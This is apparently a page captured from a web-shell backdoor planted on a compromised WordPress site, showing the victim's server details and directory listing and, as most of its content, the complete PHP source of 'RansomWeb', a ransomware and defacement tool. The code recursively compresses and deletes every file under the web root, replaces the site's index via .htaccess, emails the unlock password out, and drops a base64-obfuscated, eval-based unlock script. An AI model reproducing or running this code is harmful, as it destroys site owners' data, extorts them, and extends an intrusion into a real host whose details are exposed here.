FX Shell Backdor

Website : vivehg.com

Ip Address : 172.31.2.149

Port : 443

Kernel : Linux 52-72-122-155.cprapid.com 5.15.0-1084-aws #91~20.04.1-Ubuntu SMP Fri May 2 06:59:36 UTC 2025 x86_64

Protokol : HTTP/1.1

Save Data :

Koneksi :

Server : Apache

Root : /home/vivehg/public_html

G-Interface : CGI/1.1

R-Method : GET

Browser : Lainnya

Version Shell : 1.0 (Release candidate)

Author : FierzaXploit/Mr.MF33

PATH : /home/vivehg/public_html/blog/wp-admin/user/

Buat File

Buat Folder

Buat Ransomweb

<?php
/*
Created By CodeXploit|Mr.R4ND5
Official 22XploiterCrew
Error? Ya Maap:)
*/
error_reporting(0);
set_time_limit(0);
ini_set('memory_limit', '-1');
?>
<!doctype html>
<html lang="en">
  <head>
    
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=0.75, shrink-to-fit=no">
    <meta name="theme-color" content="#000">
    <meta name="description" content="RansomWeb BlackCoders XploiterCrew">
  <meta name="author" content="CodeXploit|Mr.R4ND5">
    
    <link href="https://fonts.googleapis.com/css?family=Rock Salt|Righteous" rel="stylesheet">
    <link rel="icon" href="https://images2.imgbox.com/90/f8/AN2yEUQJ_o.jpg" type="image/jpg">
    <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/css/bootstrap.min.css" integrity="sha384-MCw98/SFnGE8fJT3GXwEOngsV7Zt27NXFoaoApmYm81iuXoPkFOJwJ8ERdknLPMO" crossorigin="anonymous">
    <title>RansomWeb BlackCoders XploiterCrew</title>
    <style>
    	body{
    		background-color: black;
    		color: white;
    	}
    	#pass{
    		background-color: black;
    		color: white;
    		padding-right: 2px;
    	}
    	h2{
    		font-family: "Rock Salt";
    	}
    	img{
    		width: 450px;
    		height: 10px;
    		opacity:0.050;
				filter:alpha(opacity=10);
				border: 2px solid white;
				transition: 2s;
    	}
    	img:hover{
    		opacity:1;
				filter:alpha(opacity=100);
				width: 450px;
    		height: 260px;
    	}
    </style>
  </head>
  <body>
    <div class="container">
    	<h2 class="text-center mb-3 mt-3">RansomWeb</h2>
    	<hr>
    	<img src="https://2.bp.blogspot.com/-FjTg4da7Ngg/W_enfrQrQzI/AAAAAAAAD9g/1NXQHWOa8XsgMZCRD7M-Ki9l4vWwRomYACLcBGAs/s640/kimi.hime___Bb_Dskthn-7___.jpg" class="mx-auto d-block">
    	<hr>
    	<form method="post" class="was-validated" enctype="multipart/form-data">
    	<div class="table-bordered p-1">
  		<div class="row">
  			<div class="col">
  			<input id="uploadFile" placeholder="Nama File(Index Web)" disabled="disabled" class="form-control bg-transparent text-light" id="look">
  				</div>
  				<div class="col">
  		<div class="input-group">
  <div class="custom-file">
    <input type="file" class="custom-file-input bg-transparent" id="uploadBtn" name="upl_file">
    <label class="custom-file-label bg-transparent" for="uploadFile"></label>
    </div>
  </div>
 </div>
</div>
</div><hr>
    		<div class="row">
    			<div class="col">
    				<input type="text" name="pass" class="form-control" id="pass" required="required" placeholder="Password" autocomplete="off">
    			</div>
    			<div class="col">
    				<input type="email" name="msg" class="form-control" id="pass" required="required" autocomplete="off" placeholder="Emailmu(Bwt Send Pass)">
    			</div>
    		</div>
    		<input type="submit" class="btn btn-outline-success text-light btn-block mt-2" value="Kunci">
    	</form>
    	<hr>
    		<center>
    			<small>
    			
    				Copyright &copy; <?= date('Y'); ?> BlackCoders XploiterCrew
    			</small>
    		</center>
    </div>
    
    
    <script src="https://code.jquery.com/jquery-3.3.1.slim.min.js" integrity="sha384-q8i/X+965DzO0rT7abK41JStQIAqVgRVzpbzo5smXKp4YfRvH+8abtTE1Pi6jizo" crossorigin="anonymous"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.3/umd/popper.min.js" integrity="sha384-ZMP7rVo3mIykV+2+9J3UJ46jBk0WLaUAdn689aCwoqbBJiSnjAK/l8WvCWPIPm49" crossorigin="anonymous"></script>
    <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js" integrity="sha384-ChfqqxuZUCnJSK3+MXmPNIyE6ZbWh2IMqE241rYiqJxyMiZ6OW/JmZQ5stwEULTy" crossorigin="anonymous"></script>
<script type="text/javascript">
	document.getElementById("uploadBtn").onchange = function(){
		document.getElementById("uploadFile").value = this.value;
};
</script>
  </body>
</html>
<?php
if(isset($_POST["pass"])){
// Kirim Password
$untuk   = $_POST["msg"];
$subject = "Password RansomWeb BlackCoders XploiterCrew";
$headers = "[!] Password RansomWeb [!]";
$website = $_SERVER["HTTP_HOST"];
$pass    = $_POST["pass"];
$pesan   = "Nama Domain : ".$website."\nPassword : ".$pass."\nTerkunci Pada : ".date('l, d-M-Y')."\nAkses Buka File : http://".$website."/openeds.php";
if(!mail($untuk,$subject,$pesan,$headers)){
	echo "<script>
prompt('Gagal Mengunci File','Alasan => Karena Server Tidak Dapat Mengirim Email. Tar kalo lupa password lu bakal nangis');
</script>";
exit;
}else{

// Luncurkan Aksi
function KunciFile($NamaFile){
		if(strpos($NamaFile, '.xploiter') !== false){
// Kembalikan
			return;
		}
file_put_contents($NamaFile.'.xploiter',gzdeflate(file_get_contents($NamaFile), 9));
copy('.htaccess','.htaccess(BackUp)');
// Hapus File
unlink($NamaFile);

echo "$NamaFile => Terkunci\n";
}
	
echo "<hr>
<center>
<p>Locked File</p>
<small>
Buka File => ".$_SERVER["HTTP_HOST"]."/openeds.php
</small>
</center>
<textarea class='form-control text-dark' disabled rows='8'>";

/* */
function KunciDir($dir){
		$files = array_diff(scandir($dir), array('.','..'));
		foreach($files as $key){
			if(is_dir($dir."/".$key)){
				KunciDir($dir."/".$key);
			}else{
				KunciFile($dir."/".$key);
			}
		}
	}
if(isset($_POST["pass"])){
		KunciDir($_SERVER["DOCUMENT_ROOT"]);
function NamaDomain($url){
			$x = parse_url($url);
			$y = isset($x['host']) ? $x['host'] : '';
			if(preg_match('/(?P<domain>[a-z0-9][a-z0-9\-]{1,63}\.[a-z\.]{2,6})$/i', $y, $a)){
				return $a['domain'];
			} return FALSE;
		}
	}

// Buat Tampilan index web
$server_web = $_SERVER["DOCUMENT_ROOT"];
$nama_file  = $_FILES["upl_file"]["name"];
$tmp_upload = $server_web.'/'.$nama_file;
@copy($_FILES["upl_file"]["tmp_name"],$tmp_upload);
				 
// Buat .htaccess
$b = "#Locked\nDirectoryIndex $nama_file\nErrorDocument 404 /$nama_file";
$a =  fopen(".htaccess","w");
			fwrite($a,$b);
			fclose($a);

// Buat Akses Buka File [ Jangan Diganti!! ]
$x = base64_decode("PD9waHANCmVycm9yX3JlcG9ydGluZygwKTsNCj8+DQo8IWRvY3R5cGUgaHRtbD4NCjxodG1sIGxhbmc9ImVuIj4NCiAgPGhlYWQ+DQogICAgPCEtLSBSZXF1aXJlZCBtZXRhIHRhZ3MgLS0+DQogICAgPG1ldGEgY2hhcnNldD0idXRmLTgiPg0KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MC43NSwgc2hyaW5rLXRvLWZpdD1ubyI+DQoJCTxtZXRhIG5hbWU9ImF1dGhvciIgY29udGVudD0iQ29kZVhwbG9pdHxNci5SNE5ENSI+DQoJCTxtZXRhIG5hbWU9ImRlc2NyaXB0aW9uIiBjb250ZW50PSJVbmxvY2sgUmFuc29tV2ViIEJsYWNrQ29kZXJzIFhwbG9pdGVyQ3JldyI+DQogICAgPCEtLSBCb290c3RyYXAgQ1NTIC0tPg0KICAgIDxsaW5rIHJlbD0iaWNvbiIgaHJlZj0iaHR0cHM6Ly9jZG4ucGl4YWJheS5jb20vcGhvdG8vMjAxMi8wNS8wNy8wMi80OS9waXJhdGUtNDc3MDVfOTYwXzcyMC5wbmciIHR5cGU9ImltYWdlL2pwZyI+DQogICAgPGxpbmsgcmVsPSJzdHlsZXNoZWV0IiBocmVmPSJodHRwczovL3N0YWNrcGF0aC5ib290c3RyYXBjZG4uY29tL2Jvb3RzdHJhcC80LjEuMy9jc3MvYm9vdHN0cmFwLm1pbi5jc3MiIGludGVncml0eT0ic2hhMzg0LU1Ddzk4L1NGbkdFOGZKVDNHWHdFT25nc1Y3WnQyN05YRm9hb0FwbVltODFpdVhvUGtGT0p3SjhFUmRrbkxQTU8iIGNyb3Nzb3JpZ2luPSJhbm9ueW1vdXMiPg0KICAgIDx0aXRsZT5SYW5zb21XZWIgQmxhY2tDb2RlcnMgWHBsb2l0ZXJDcmV3PC90aXRsZT4NCiAgPC9oZWFkPg0KICA8Ym9keSBjbGFzcz0iYmctZGFyayI+DQogIAk8aDMgY2xhc3M9InRleHQtY2VudGVyIHRleHQtbGlnaHQgbXQtMyI+R2F1c2FoIFRlcmxhbHUgUmliZXQgR2F5bjwvaDM+PGhyPg0KICAgIDxkaXYgY2xhc3M9ImNvbnRhaW5lciI+DQogICAgCTxmb3JtIG1ldGhvZD0icG9zdCI+DQogICAgCQk8aW5wdXQgdHlwZT0idGV4dCIgbmFtZT0icGFzcyIgY2xhc3M9ImZvcm0tY29udHJvbCBtYi0zIiBwbGFjZWhvbGRlcj0iWWFuZyBQZW50aW5nIFlha2luIj4NCiAgICAJCTxpbnB1dCB0eXBlPSJzdWJtaXQiIGNsYXNzPSJidG4gYnRuLXByaW1hcnkgYnRuLWJsb2NrIiB2YWx1ZT0iQnVrYSBGaWxlIj4NCiAgICAJPC9mb3JtPg0KICAgIAk8aHI+DQogICAgCQk8Y2VudGVyPg0KICAgIAkJCTxzbWFsbCBjbGFzcz0idGV4dC1saWdodCI+DQogICAgCQkJPCEtLSBHYW50aSBNYW5kdWxsICsgTWFxbG8gSGVrZXIgLS0+DQogICAgCQkJCUNvcHlyaWdodCAmY29weTsgPD89IGRhdGUoJ1knKTsgPz4gQmxhY2tDb2RlcnMgWHBsb2l0ZXJDcmV3DQogICAgCQkJPC9zbWFsbD4NCiAgICAJCTwvY2VudGVyPg0KICAgIDwvZGl2Pg0KDQogICAgPCEtLSBPcHRpb25hbCBKYXZhU2NyaXB0IC0tPg0KICAgIDwhLS0galF1ZXJ5IGZpcnN0LCB0aGVuIFBvcHBlci5qcywgdGhlbiBCb290c3RyYXAgSlMgLS0+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY29kZS5qcXVlcnkuY29tL2pxdWVyeS0zLjMuMS5zbGltLm1pbi5qcyIgaW50ZWdyaXR5PSJzaGEzODQtcThpL1grOTY1RHpPMHJUN2FiSzQxSlN0UUlBcVZnUlZ6cGJ6bzVzbVhLcDRZZlJ2SCs4YWJ0VEUxUGk2aml6byIgY3Jvc3NvcmlnaW49ImFub255bW91cyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL3BvcHBlci5qcy8xLjE0LjMvdW1kL3BvcHBlci5taW4uanMiIGludGVncml0eT0ic2hhMzg0LVpNUDdyVm8zbUl5a1YrMis5SjNVSjQ2akJrMFdMYVVBZG42ODlhQ3dvcWJCSmlTbmpBSy9sOFd2Q1dQSVBtNDkiIGNyb3Nzb3JpZ2luPSJhbm9ueW1vdXMiPjwvc2NyaXB0Pg0KICAgIDxzY3JpcHQgc3JjPSJodHRwczovL3N0YWNrcGF0aC5ib290c3RyYXBjZG4uY29tL2Jvb3RzdHJhcC80LjEuMy9qcy9ib290c3RyYXAubWluLmpzIiBpbnRlZ3JpdHk9InNoYTM4NC1DaGZxcXh1WlVDbkpTSzMrTVhtUE5JeUU2WmJXaDJJTXFFMjQxcllpcUp4eU1pWjZPVy9KbVpRNXN0d0VVTFR5IiBjcm9zc29yaWdpbj0iYW5vbnltb3VzIj48L3NjcmlwdD4NCiAgPC9ib2R5Pg0KPC9odG1sPg0KPD9waHANCiRwYXNzID0gIkhhY2tlZCI7IC8vIFBhc3N3b3JkIERlZmF1bHQNCiRtYWlsID0gImFrdWhla2VyQHBlcm8uY29tIjsNCiRkcHMgID0gImlraXNrcmlwa3V4Y29rIjsNCmlmKGlzc2V0KCRfUE9TVFsicGFzcyJdKSl7DQoJaWYobWQ1KCRfUE9TVFsicGFzcyJdKSA9PSAkcGFzcyl7DQoJCWZ1bmN0aW9uIEJ1a2FGaWxlKCROYW1hRmlsZSl7DQoJCQlpZihzdHJwb3MoJE5hbWFGaWxlLCcueHBsb2l0ZXInKSA9PT0gRkFMU0Upew0KCQkJCXJldHVybjsgLy8gS2VtYmFsaWthbiENCgkJCX0NCiRCdWthID0gZ3ppbmZsYXRlKGZpbGVfZ2V0X2NvbnRlbnRzKCROYW1hRmlsZSkpOw0KZmlsZV9wdXRfY29udGVudHMoc3RyX3JlcGxhY2UoJy54cGxvaXRlcicsICcnLCAkTmFtYUZpbGUpLCAkQnVrYSk7DQoNCi8vIEhhcHVzIEZpbGUNCnVubGluaygnLmh0YWNjZXNzJyk7DQp1bmxpbmsoJE5hbWFGaWxlKTsNCg0KZWNobyAiJE5hbWFGaWxlID0+IFRlcmJ1a2FcbiI7DQoJCX0NCgkJDQplY2hvICI8aHI+DQo8Y2VudGVyPg0KPHAgY2xhc3M9J3RleHQtbGlnaHQnPlVubG9jayBGaWxlPC9wPg0KPC9jZW50ZXI+DQo8dGV4dGFyZWEgY2xhc3M9J2Zvcm0tY29udHJvbCB0ZXh0LWRhcmsnIGRpc2FibGVkIHJvd3M9JzgnPiI7DQoNCgkJZnVuY3Rpb24gQnVrYURpcigkZGlyKXsNCgkJCSRmaWxlcyA9IGFycmF5X2RpZmYoc2NhbmRpcigkZGlyKSwgYXJyYXkoJy4nLCAnLi4nKSk7DQoJCQlmb3JlYWNoKCRmaWxlcyBhcyAka2V5KXsNCgkJCQlpZihpc19kaXIoJGRpci4iLyIuJGtleSkpew0KCQkJCQlCdWthRGlyKCRkaXIuIi8iLiRrZXkpOw0KCQkJCX1lbHNlew0KCQkJCQlCdWthRmlsZSgkZGlyLiIvIi4ka2V5KTsNCgkJCQl9DQoJCQl9DQoJCX0NCgkJQnVrYURpcigkX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddKTsNCgkJdW5saW5rKCRfU0VSVkVSWydQSFBfU0VMRiddKTsNCgkJdW5saW5rKCdvcGVuZWRzLnBocCcpOw0KCQl1bmxpbmsoJy5odGFjY2VzcycpOw0KCQljb3B5KCcuaHRhY2Nlc3MoQmFja1VwKScsJy5odGFjY2VzcycpOw0KCQl1bmxpbmsoJy5odGFjY2VzcyhCYWNrVXApJyk7DQoNCiR1bnR1ayAgID0gJG1haWw7DQokc3ViamVjdCA9ICJSYW5zb21XZWIgQmxhY2tDb2RlcnMgWHBsb2l0ZXJDcmV3IjsNCiRoZWFkZXJzID0gIlshXSBSYW5zb21XZWIgQmxhY2tDb2RlcnMgWHBsb2l0ZXJDcmV3IFshXSI7DQokd2Vic2l0ZSA9ICRfU0VSVkVSWyJIVFRQX0hPU1QiXTsNCiRwZXNhbiAgID0gIk5hbWEgRG9tYWluIDogIi4kd2Vic2l0ZS4iXG5UZXJidWthIFBhZGEgOiAiLmRhdGUoJ2wsIGQtTS1ZJykuIlxuU2NyaXB0IERlZmFjZSA6IGh0dHA6Ly8iLiR3ZWJzaXRlLiIvIi4kZHBzLiJcblxuVGhhbmtzIERhaCBNZW5nZ3VuYWthbiBSYW5zb20gS2FtaTopIjsNCm1haWwoJHVudHVrLCRzdWJqZWN0LCRwZXNhbiwkaGVhZGVycyk7DQoJDQplY2hvICI8L3RleHRhcmVhPg0KPHNjcmlwdD4NCnByb21wdCgnU3Vrc2VzIE1lbWJ1a2EgU2VtdWEgRmlsZScsZG9jdW1lbnQuZG9tYWluKTsNCjwvc2NyaXB0PiI7DQoJfWVsc2V7DQoJCWVjaG8gIjxzY3JpcHQ+YWxlcnQoJ1Bhc3N3b3JkIFRpZGFrIENvY29rJyk8L3NjcmlwdD4iOw0KCX0NCglleGl0Ow0KfQ0KPz4=");
$mx = str_replace("akuheker@pero.com", $_POST["msg"], $x);
$y = str_replace("Hacked", md5($_POST["pass"]), $mx);
$xyz = str_replace("ikiskripkuxcok", $nama_file, $y);
$z = "<?php eval('?>'.base64_decode("."'".base64_encode($xyz)."'".").'<?php '); ?>";
$xy = fopen('openeds.php','w');
			fwrite($xy, $z);
			fclose($xy);

/* Done */
	
echo "</textarea>
<script>
prompt('Sukses Mengunci Semua File',document.domain);
</script>";
	}
}
?>

Type	Name	options
	RansomWeb.php
	about.php
	admin.php
	contribute.php
	credits.php
	freedoms.php
	index.php
	menu.php
	privacy.php
	profile.php
	user-edit.php